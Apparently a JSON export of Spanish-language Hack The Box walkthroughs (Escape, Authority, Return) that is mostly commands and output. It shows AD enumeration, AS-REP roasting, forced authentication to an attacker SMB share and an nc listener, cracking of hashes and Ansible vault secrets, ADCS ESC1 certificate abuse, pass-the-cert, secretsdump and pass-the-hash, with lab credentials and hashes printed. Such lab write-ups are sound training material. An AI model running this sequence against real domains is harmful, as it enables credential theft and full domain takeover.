[{"id":"escape","title":"HTB - Escape","description":"Escape","date":"2025-08-14T00:00:00.000Z","tags":["SMB","ASREPRoast","impacket","SQL","john","winPEAS","ADCS","certipy","certificate","evil-winrm"],"authors":["r4cc0x"],"url":"/blog/escape","content":"```zsh ping -c 3 10.10.11.202 PING 10.10.11.202 (10.10.11.202) 56(84) bytes of data. 64 bytes from 10.10.11.202: icmp_seq=1 ttl=127 time=75.9 ms 64 bytes from 10.10.11.202: icmp_seq=2 ttl=127 time=76.8 ms 64 bytes from 10.10.11.202: icmp_seq=3 ttl=127 time=75.0 ms ``` ```zsh sudo nmap -p- --open --min-rate 5000 -v -n -Pn 10.10.11.202 -oG allPorts ``` ```zsh # Nmap 7.95 scan initiated Thu Aug 14 03:41:42 2025 as: /usr/lib/nmap/nmap --privileged -sCV -p 53,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389,49667,49689,49690,49710,49726 -oN targeted 10.10.11.202 Nmap scan report for 10.10.11.202 Host is up (0.075s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-14 08:27:06Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel | Not valid before: 2024-01-18T23:03:57 |_Not valid after: 2074-01-05T23:03:57 |_ssl-date: 2025-08-14T08:28:45+00:00; +45m27s from scanner time. 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel | Not valid before: 2024-01-18T23:03:57 |_Not valid after: 2074-01-05T23:03:57 |_ssl-date: 2025-08-14T08:28:44+00:00; +45m26s from scanner time. 1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM | ms-sql-info: | 10.10.11.202:1433: | Version: | name: Microsoft SQL Server 2019 RTM | number: 15.00.2000.00 | Product: Microsoft SQL Server 2019 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 | ms-sql-ntlm-info: | 10.10.11.202:1433: | Target_Name: sequel | NetBIOS_Domain_Name: sequel | NetBIOS_Computer_Name: DC | DNS_Domain_Name: sequel.htb | DNS_Computer_Name: dc.sequel.htb | DNS_Tree_Name: sequel.htb |_ Product_Version: 10.0.17763 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2025-08-14T08:21:19 |_Not valid after: 2055-08-14T08:21:19 |_ssl-date: 2025-08-14T08:28:45+00:00; +45m27s from scanner time. 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel | Not valid before: 2024-01-18T23:03:57 |_Not valid after: 2074-01-05T23:03:57 |_ssl-date: 2025-08-14T08:28:45+00:00; +45m27s from scanner time. 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-08-14T08:28:44+00:00; +45m26s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel | Not valid before: 2024-01-18T23:03:57 |_Not valid after: 2074-01-05T23:03:57 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 9389/tcp open mc-nmf .NET Message Framing 49667/tcp open msrpc Microsoft Windows RPC 49689/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49690/tcp open msrpc Microsoft Windows RPC 49710/tcp open msrpc Microsoft Windows RPC 49726/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required |_clock-skew: mean: 45m25s, deviation: 1s, median: 45m25s | smb2-time: | date: 2025-08-14T08:28:01 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu Aug 14 03:43:19 2025 -- 1 IP address (1 host up) scanned in 96.92 seconds ``` ```zsh echo \"10.10.11.202 dc.sequel.htb sequel.htb\" | sudo tee -a /etc/hosts ``` ```zsh nxc smb 10.10.11.202 SMB 10.10.11.202 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False) ``` ```zsh nxc smb 10.10.11.202 -u 'guest' -p '' --rid-brute ``` ```zsh cat userst | awk 'NF{print $6}' | sed 's/sequel\\\\//' > users ``` ```d Tom.Henn Brandon.Brown Ryan.Cooper sql_svc James.Roberts Nicole.Thompson SQLServer2005SQLBrowserUser$DC ``` ## AS-REP Roast ```zsh impacket-GetNPUsers -no-pass -usersfile users sequel.htb/ 2>/dev/null ``` ![image](image.png) ```zsh impacket-mssqlclient sequel.htb/'PublicUser':'GuestUserCantWrite1'@10.10.11.202 ``` ```zsh QL (PublicUser guest@master)> help lcd {path} - changes the current local directory to {path} exit - terminates the server process (and this session) enable_xp_cmdshell - you know what it means disable_xp_cmdshell - you know what it means enum_db - enum databases enum_links - enum linked servers enum_impersonate - check logins that can be impersonated enum_logins - enum login users enum_users - enum current db users enum_owner - enum db owner exec_as_user {user} - impersonate with execute as user exec_as_login {login} - impersonate with execute as login xp_cmdshell {cmd} - executes cmd using xp_cmdshell xp_dirtree {path} - executes xp_dirtree on the path sp_start_job {cmd} - executes cmd using the sql server agent (blind) use_link {link} - linked server to use (set use_link localhost to go back to local or use_link .. to get back one step) ! {cmd} - executes a local shell cmd upload {from} {to} - uploads file {from} to the SQLServer host {to} show_query - show query mask_query - mask query SQL (PublicUser guest@master)> enum_db name is_trustworthy_on ------ ----------------- master 0 tempdb 0 model 0 msdb 1 SQL (PublicUser guest@master)> ``` ```zsh impacket-smbserver racc0x $(pwd) -smb2support ``` ```zsh SQL (PublicUser guest@master)> EXEC Master.dbo.xp_dirtree\"\\\\10.10.14.5\\9090\",1,1; ``` ![image](image-1.png) ```zsh john hash -w=/usr/share/wordlists/rockyou.txt ``` ![image](image-2.png) ```zsh sql_svc REGGIE1234ronnie ``` ```zsh nxc smb 10.10.11.202 -u 'sql_svc' -p 'REGGIE1234ronnie' SMB 10.10.11.202 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False) SMB 10.10.11.202 445 DC [+] sequel.htb\\sql_svc:REGGIE1234ronnie ``` ```zsh nxc wirm 10.10.11.202 -u 'sql_svc' -p 'REGGIE1234ronnie' WINRM 10.10.11.202 5985 DC [+] sequel.htb\\sql_svc:REGGIE1234ronnie (Pwn3d!) ``` ```zsh nxc smb 10.10.11.202 -u 'ryan.cooper' -p 'NuclearMosquito3' SMB 10.10.11.202 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False) SMB 10.10.11.202 445 DC [+] sequel.htb\\ryan.cooper:NuclearMosquito3 ``` ![image](image-3.png) ## PrivEsc ### winPEAS ![image](image-4.png) ## ADCS - ESC1 ```zsh certipy-ad find -vulnerable -u ryan.cooper -p 'NuclearMosquito3' -dc-ip 10.10.11.202 -stdout ``` ![image](image-5.png) ```zsh certipy-ad req -u Ryan.cooper@10.10.11.202 -dc-ip 10.10.11.202 -p \"NuclearMosquito3\" -template UserAuthentication -upn administrator@sequel.htb -ca 'sequel-DC-CA' ``` ```zsh Certipy v5.0.2 - by Oliver Lyak (ly4k) [*] Requesting certificate via RPC [*] Request ID is 13 [*] Successfully requested certificate [*] Got certificate with UPN 'administrator@sequel.htb' [*] Certificate has no object SID [*] Try using -sid to set the object SID or see the wiki for more details [*] Saving certificate and private key to 'administrator.pfx' [*] Wrote certificate and private key to 'administrator.pfx' ``` ```zsh certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.202 ``` ```zsh Certipy v5.0.2 - by Oliver Lyak (ly4k) [*] Certificate identities: [*] SAN UPN: 'administrator@sequel.htb' [*] Using principal: 'administrator@sequel.htb' [*] Trying to get TGT... [*] Got TGT [*] Saving credential cache to 'administrator.ccache' [*] Wrote credential cache to 'administrator.ccache' [*] Trying to retrieve NT hash for 'administrator' [*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee ``` Verificamos credenciales ![image](image-6.png) ```zsh evil-winrm -i 10.10.11.202 -u 'administrator' -H ':a52f78e4c751e5f5e17e1e9f3e58f4ee' ``` ![image](image-7.png)"},{"id":"authority","title":"HTB - Authority","description":"Authority","date":"2025-08-13T00:00:00.000Z","tags":["SMB","Web","ansible2john","regex","LDAP-LDAPs","winPEAS","evil-winrm","ADCS","certificate","ms-DS-MachineAccountQuota","PowerView","Certipy","kerberos","impacket","passthecert","secretsdump"],"authors":["r4cc0x"],"url":"/blog/authority","content":"## Recon ```zsh sudo nmap -p- --open --min-rate 5000 -v -n -Pn 10.10.11.222 -oG allPorts nmap -sCV -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,8443,9389,47001,49664,49665,49666,49667,49673,49690,49691,49693,49694,49703,49711,64966,65012 10.10.11.222 -oN targeted ``` ```zsh # Nmap 7.95 scan initiated Tue Aug 12 04:11:28 2025 as: /usr/lib/nmap/nmap --privileged -sCV -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,8443,9389,47001,49664,49665,49666,49667,49673,49690,49691,49693,49694,49703,49711,64966,65012 -oN targeted 10.10.11.222 Nmap scan report for 10.10.11.222 Host is up (0.076s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server | http-methods: |_ Potentially risky methods: TRACE 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-12 04:31:22Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: othername: UPN:AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB | Not valid before: 2022-08-09T23:03:21 |_Not valid after: 2024-08-09T23:13:21 |_ssl-date: 2025-08-12T04:32:37+00:00; -3h40m06s from scanner time. 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name) |_ssl-date: 2025-08-12T04:32:37+00:00; -3h40m06s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: othername: UPN:AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB | Not valid before: 2022-08-09T23:03:21 |_Not valid after: 2024-08-09T23:13:21 3268 /tcp open ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: othername: UPN:AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB | Not valid before: 2022-08-09T23:03:21 |_Not valid after: 2024-08-09T23:13:21 |_ssl-date: 2025-08-12T04:32:37+00:00; -3h40m06s from scanner time. 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: othername: UPN:AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB | Not valid before: 2022-08-09T23:03:21 |_Not valid after: 2024-08-09T23:13:21 |_ssl-date: 2025-08-12T04:32:37+00:00; -3h40m06s from scanner time. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 8443/tcp open ssl/http Apache Tomcat (language: en) |_ssl-date: TLS randomness does not represent time |_http-title: Site doesnt have a title (text/html;charset=ISO-8859-1). | ssl-cert: Subject: commonName=172.16.2.118 | Not valid before: 2025-08-10T04:21:48 |_Not valid after: 2027-08-12T16:00:12 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49673/tcp open msrpc Microsoft Windows RPC 49690/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49691/tcp open msrpc Microsoft Windows RPC 49693/tcp open msrpc Microsoft Windows RPC 49694/tcp open msrpc Microsoft Windows RPC 49703/tcp open msrpc Microsoft Windows RPC 49711/tcp open msrpc Microsoft Windows RPC 64966/tcp open msrpc Microsoft Windows RPC 65012/tcp open msrpc Microsoft Windows RPC Service Info: Host: AUTHORITY; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2025-08-12T04:32:28 |_ start_date: N/A |_clock-skew: mean: -3h40m06s, deviation: 0s, median: -3h40m06s | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Aug 12 04:12:43 2025 -- 1 IP address (1 host up) scanned in 74.69 seconds ``` ```zsh echo \"10.10.11.222 authority.htb\" | sudo tee -a /etc/hosts ``` ```zsh nxc smb 10.10.11.222 SMB 10.10.11.222 445 AUTHORITY [*] Windows 10 / Server 2019 Build 17763 x64 (name:AUTHORITY) (domain:authority.htb) (signing:True) (SMBv1:False) ``` ```zsh nxc smb 10.10.11.222 -u 'guest' -p '' --shares SMB 10.10.11.222 445 AUTHORITY [+] authority.htb\\guest: SMB 10.10.11.222 445 AUTHORITY [*] Enumerated shares SMB 10.10.11.222 445 AUTHORITY Share Permissions Remark SMB 10.10.11.222 445 AUTHORITY ----- ----------- ------ SMB 10.10.11.222 445 AUTHORITY ADMIN$ Remote Admin SMB 10.10.11.222 445 AUTHORITY C$ Default share SMB 10.10.11.222 445 AUTHORITY Department Shares SMB 10.10.11.222 445 AUTHORITY Development READ SMB 10.10.11.222 445 AUTHORITY IPC$ READ Remote IPC SMB 10.10.11.222 445 AUTHORITY NETLOGON Logon server share SMB 10.10.11.222 445 AUTHORITY SYSVOL Logon server share ``` ```zsh nxc smb 10.10.11.222 -u 'guest' -p '' --rid-brute SMB 10.10.11.222 445 AUTHORITY [*] Windows 10 / Server 2019 Build 17763 x64 (name:AUTHORITY) (domain:authority.htb) (signing:True) (SMBv1:False) SMB 10.10.11.222 445 AUTHORITY [+] authority.htb\\guest: SMB 10.10.11.222 445 AUTHORITY 498: HTB\\Enterprise Read-only Domain Controllers (SidTypeGroup) SMB 10.10.11.222 445 AUTHORITY 500: HTB\\Administrator (SidTypeUser) SMB 10.10.11.222 445 AUTHORITY 501: HTB\\Guest (SidTypeUser) SMB 10.10.11.222 445 AUTHORITY 502: HTB\\krbtgt (SidTypeUser) SMB 10.10.11.222 445 AUTHORITY 512: HTB\\Domain Admins (SidTypeGroup) SMB 10.10.11.222 445 AUTHORITY 513: HTB\\Domain Users (SidTypeGroup) SMB 10.10.11.222 445 AUTHORITY 514: HTB\\Domain Guests (SidTypeGroup) SMB 10.10.11.222 445 AUTHORITY 515: HTB\\Domain Computers (SidTypeGroup) SMB 10.10.11.222 445 AUTHORITY 516: HTB\\Domain Controllers (SidTypeGroup) SMB 10.10.11.222 445 AUTHORITY 517: HTB\\Cert Publishers (SidTypeAlias) SMB 10.10.11.222 445 AUTHORITY 518: HTB\\Schema Admins (SidTypeGroup) SMB 10.10.11.222 445 AUTHORITY 519: HTB\\Enterprise Admins (SidTypeGroup) SMB 10.10.11.222 445 AUTHORITY 520: HTB\\Group Policy Creator Owners (SidTypeGroup) SMB 10.10.11.222 445 AUTHORITY 521: HTB\\Read-only Domain Controllers (SidTypeGroup) SMB 10.10.11.222 445 AUTHORITY 522: HTB\\Cloneable Domain Controllers (SidTypeGroup) SMB 10.10.11.222 445 AUTHORITY 525: HTB\\Protected Users (SidTypeGroup) SMB 10.10.11.222 445 AUTHORITY 526: HTB\\Key Admins (SidTypeGroup) SMB 10.10.11.222 445 AUTHORITY 527: HTB\\Enterprise Key Admins (SidTypeGroup) SMB 10.10.11.222 445 AUTHORITY 553: HTB\\RAS and IAS Servers (SidTypeAlias) SMB 10.10.11.222 445 AUTHORITY 571: HTB\\Allowed RODC Password Replication Group (SidTypeAlias) SMB 10.10.11.222 445 AUTHORITY 572: HTB\\Denied RODC Password Replication Group (SidTypeAlias) SMB 10.10.11.222 445 AUTHORITY 1000: HTB\\AUTHORITY$ (SidTypeUser) SMB 10.10.11.222 445 AUTHORITY 1101: HTB\\DnsAdmins (SidTypeAlias) SMB 10.10.11.222 445 AUTHORITY 1102: HTB\\DnsUpdateProxy (SidTypeGroup) SMB 10.10.11.222 445 AUTHORITY 1601: HTB\\svc_ldap (SidTypeUser) ``` ### File Share (SMB) ```zsh smbclient //10.10.11.222/Development -U 'guest' ``` ```zsh smbclient '\\\\10.10.11.222\\Development' -N -c 'prompt OFF;recurse ON;cd 'Development\\Automation\\Ansible\\ADCS';lcd '~/Documents/HTB/Authority/content/';mget *' ``` ```zsh grep -r -i \"password\" ``` ![image](image.png) ```zsh admin T0mc@tAdm1n robot T0mc@tR00t ``` ### Web (8443) ```zsh https://10.10.11.222:8443/pwm/private/login ``` ![image](image-1.png) ![image](image-2.png) ```zsh grep -r -i \"svc\" PWM/ansible.cfg:remote_user = svc_pwm cat PWM/ansible.cfg ``` ![image](image-3.png) ### Ansible Vault https://www.bengrewell.com/cracking-ansible-vault-secrets-with-hashcat/ ```zsh awk 'NR==1{print; next} {printf \"%s\", $0} END{print \"\"}' login | tr -d ' ' > pwm_admin_login awk 'NR==1{print; next} {printf \"%s\", $0} END{print \"\"}' password | tr -d ' ' > pwm_admin_password awk 'NR==1{print; next} {printf \"%s\", $0} END{print \"\"}' ldap | tr -d ' ' > ldap_admin_passwor ``` ```zsh ansible2john pwm_admin_login > pwm_login.hash ansible2john pwm_admin_password > pwm_pass.hash ansible2john ldap_admin_password > ldap_pass.hash ``` ### John ```zsh john ldap_pass.hash -w=/usr/share/wordlists/rockyou.txt ``` ![image](image-4.png) ``` !@#$%^&* ``` ```zsh cat ldap_admin_password | ansible-vault decrypt; echo ``` ![image](image-5.png) - ldap_admin_password ``` DevT3st@123 ``` - pwm_admin_password ```zsh pWm_@dm!N_!23 ``` - login ``` svc_pwm ``` ```zsh nxc smb 10.10.11.222 -u 'svc_pwm' -p 'pWm_@dm!N_!23' ``` ```zsh SMB 10.10.11.222 445 AUTHORITY [*] Windows 10 / Server 2019 Build 17763 x64 (name:AUTHORITY) (domain:authority.htb) (signing:True) (SMBv1:False) SMB 10.10.11.222 445 AUTHORITY [+] authority.htb\\svc_pwm:pWm_@dm!N_!23 (Guest) ``` #### Configuration Manager ![image](image-6.png) En esta parte podemos modificar la direccion URL para verificar si se esta enviando datos sensibles como credenciales. ![image](image-7.png) Antes debemos modificar ``ldaps`` a ``ldap`` ya que ldap es sin SSL\\TLS. Como en este caso que viaja informacion pero con ldaps nos llega la informacion cifrada: ![image](image-8.png) ```zsh ldap://10.10.14.5:389 nc -lvnp 389 listening on [any] 389 ... connect to [10.10.14.5] from (UNKNOWN) [10.10.11.222] 58954 0Y`T;CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb�lDaP_1n_th3_cle4r! ``` ```zsh svc_ldap lDaP_1n_th3_cle4r! ``` ```zsh nxc smb 10.10.11.222 -u 'svc_ldap' -p 'lDaP_1n_th3_cle4r!' ``` ![image](image-9.png) ![image](image-10.png) ```zsh evil-winrm -i 10.10.11.222 -u svc_ldap -p 'lDaP_1n_th3_cle4r!' ``` ```powershell net user svc_ldap User name svc_ldap Full Name Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 8/10/2022 9:29:31 PM Password expires Never Password changeable 8/11/2022 9:29:31 PM Password required Yes User may change password No Workstations allowed All Logon script User profile Home directory Last logon 7/5/2023 8:43:09 PM Logon hours allowed All Local Group Memberships *Remote Management Use Global Group memberships *Domain Users The command completed successfully. ``` - Upload winPEAS ![image](image-11.png) ```zsh certipy-ad find -vulnerable -u svc_ldap -p 'lDaP_1n_th3_cle4r!' -dc-ip 10.10.11.222 -stdout ``` ![image](image-12.png) ## ADCS - ESC1 ```zsh certipy-ad req -u 'svc_ldap' -dc-ip 10.10.11.222 -target-ip 10.10.11.222 -p 'lDaP_1n_th3_cle4r!' -template CorpVPN -upn administrator@authority.htb -ca 'AUTHORITY-CA ``` ![image](image-13.png) Esto es porque los permisos solo los tiene los grupos `DOMAIN COMPUTERS`, `DOMAIN ADMINS` . ![image](image-14.png) ### Verificar la cuota de \"Join Computer\" (ms-DS-MachineAccountQuota) ```powershell Get-ADUser -Identity svc_ldap -Properties MemberOf | Select-Object -ExpandProperty MemberOf ``` ```powershell Get-ADObject -Identity \"DC=authority,DC=htb\" -Properties ms-DS-MachineAccountQuota ``` Por defecto, los usuarios autenticados pueden unir hasta **10 computadoras** al dominio gracias al atributo `ms-DS-MachineAccountQuota` en el dominio. ```powershell DistinguishedName : DC=authority,DC=htb ms-DS-MachineAccountQuota : 10 Name : authority ObjectClass : domainDNS ObjectGUID : 011a2802-ff7d-4748-bd64-b7386cae0bd2 ``` Como podemos ver tiene delegación explícita en la OU de computadoras, lo cual nos permite ejecutar `Add-Computer`. https://github.com/aniqfakhrul/powerview.py https://github.com/aniqfakhrul/powerview.py?tab=readme-ov-file#module-available-so-far ```zsh powerview authority.htb/'svc_ldap':'lDaP_1n_th3_cle4r!'@10.10.11.222 --dc-ip 10.10.11.222 ``` ![image](image-15.png) ```powershell Add-ADComputer -ComputerName racc0x -ComputerPass racc0x123! ``` ```powershell PV ❯ Get-ADObject -Identity racc0x$ objectClass : top person organizationalPerson user computer cn : racc0x distinguishedName : CN=racc0x,CN=Computers,DC=authority,DC=htb instanceType : 4 whenCreated : 13/08/2025 06:48:03 (today) whenChanged : 13/08/2025 06:48:03 (today) uSNCreated : 262363 uSNChanged : 262365 name : racc0x objectGUID : {267e56f5-f1da-44b2-a8f0-ca959b55e277} userAccountControl : WORKSTATION_TRUST_ACCOUNT badPwdCount : 0 codePage : 0 countryCode : 0 badPasswordTime : 01/01/1601 00:00:00 (424 years, 7 months ago) lastLogoff : 1601-01-01 00:00:00+00:00 lastLogon : 01/01/1601 00:00:00 (424 years, 7 months ago) localPolicyFlags : 0 pwdLastSet : 13/08/2025 06:48:03 (today) primaryGroupID : 515 objectSid : S-1-5-21-622327497-3269355298-2248959698-11602 accountExpires : 9999-12-31 23:59:59.999999+00:00 logonCount : 0 sAMAccountName : racc0x$ sAMAccountType : SAM_MACHINE_ACCOUNT dNSHostName : racc0x.authority.htb servicePrincipalName : RestrictedKrbHost/racc0x.authority.htb RestrictedKrbHost/racc0x HOST/racc0x.authority.htb HOST/racc0x objectCategory : CN=Computer,CN=Schema,CN=Configuration,DC=authority,DC=htb isCriticalSystemObject : False dSCorePropagationData : 01/01/1601 00:00:00 AM mS-DS-CreatorSID : S-1-5-21-622327497-3269355298-2248959698-1601 ``` ```zsh certipy-ad req -u 'racc0x$'@10.10.11.222 -dc-ip 10.10.11.222 -p 'racc0x123!' -template CorpVPN -upn administrator@authority.htb -ca 'AUTHORITY-CA' ``` ![image](image-16.png) ```zsh certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.222 ``` ![image](image-17.png) **\"KDC_ERR_PADATA_TYPE_NOSUPP\"** _\"...cuando un controlador de dominio no tiene instalado un certificado para tarjetas inteligentes...\"_ es probablemente la razón más común para este error. Si el DC no tiene un certificado de **\"Controlador de dominio\"**, **\"Autenticación de controlador de dominio\"** u otro certificado con el EKU (Uso mejorado de clave) **\"Autenticación de servidor\"** (OID 1.3.6.1.5.5.7.3.1) instalado, el DC no está configurado correctamente para **PKINIT** y la autenticación fallará. https://posts.specterops.io/certificates-and-pwnage-and-patches-oh-my-8ae0f4304c1d https://www.thehacker.recipes/ad/movement/schannel/passthecert#theory ```zsh certipy-ad cert -pfx administrator.pfx -nokey -out admin.crt certipy-ad cert -pfx administrator.pfx -nocert -out admin.key ``` ```zsh python3 passthecert.py -action whoami -crt admin.crt -key admin.key -domain authority.htb -dc-ip 10.10.11.222 ``` ![image](image-18.png) ```zsh python3 passthecert.py -action ldap-shell -crt admin.crt -key admin.key -domain authority.htb -dc-ip 10.10.11.222 ``` ![image](image-19.png) ```zsh add_user_to_group svc_ldap \"Domain Admins\" ``` ![image](image-20.png) https://www.thehacker.recipes/ad/movement/ntlm/pth#practice Comprobamos ``` net group \"Domain Admins\" ``` ![image](image-21.png) Dump Hashes ```zsh impacket-secretsdump authority.htb/svc_ldap:'lDaP_1n_th3_cle4r!'@10.10.11.222 -dc-ip 10.10.11.222 -just-dc-ntlm ``` ![image](image-22.png) Verificamos las credenciales ![image](image-23.png)"},{"id":"return","title":"HTB - Return","description":"Return","date":"2025-08-10T00:00:00.000Z","tags":["Information-Disclosure","SMB","LDAP","SeBackupPrivilege","ServerOperators","services"],"authors":["r4cc0x"],"url":"/blog/return","content":"```zsh ping -c 3 10.10.11.108 PING 10.10.11.108 (10.10.11.108) 56(84) bytes of data. 64 bytes from 10.10.11.108: icmp_seq=1 ttl=127 time=55.7 ms 64 bytes from 10.10.11.108: icmp_seq=2 ttl=127 time=57.3 ms 64 bytes from 10.10.11.108: icmp_seq=3 ttl=127 time=56.7 ms ``` ## Recon ```zsh sudo nmap -p- --open --min-rate 5000 -v -n -Pn 10.10.11.108 -oG allPorts nmap -sCV -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49674,49675,49679,49682,49694,52656 10.10.11.108 -oN targeted ``` ```zsh # Nmap 7.95 scan initiated Mon Aug 11 05:47:54 2025 as: /usr/lib/nmap/nmap --privileged -sCV -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49674,49675,49679,49682,49694,52656 -oN targeted 10.10.11.108 Nmap scan report for 10.10.11.108 Host is up (0.057s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-title: HTB Printer Admin Panel |_http-server-header: Microsoft-IIS/10.0 | http-methods: |_ Potentially risky methods: TRACE 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-11 02:17:26Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49671/tcp open msrpc Microsoft Windows RPC 49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49675/tcp open msrpc Microsoft Windows RPC 49679/tcp open msrpc Microsoft Windows RPC 49682/tcp open msrpc Microsoft Windows RPC 49694/tcp open msrpc Microsoft Windows RPC 52656/tcp open msrpc Microsoft Windows RPC Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2025-08-11T02:18:32 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required |_clock-skew: -7h30m29s ``` Web ![image](image.png) En el apartado de settings se puede ver un usario ![image](image-1.png) `svc-printer` ![image](image-2.png) ```zsh rlwrap nc -lvnp 389 ``` ![image](image-3.png) ``` svc-printer 1edFg43012!! ``` ```zsh nxc smb 10.10.11.108 SMB 10.10.11.108 445 PRINTER [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False) ``` ```zsh nxc smb 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!' ``` ![image](image-4.png) ```zsh nxc smb 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!' --shares ``` ```d SMB 10.10.11.108 445 PRINTER [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False) SMB 10.10.11.108 445 PRINTER [+] return.local\\svc-printer:1edFg43012!! SMB 10.10.11.108 445 PRINTER [*] Enumerated shares SMB 10.10.11.108 445 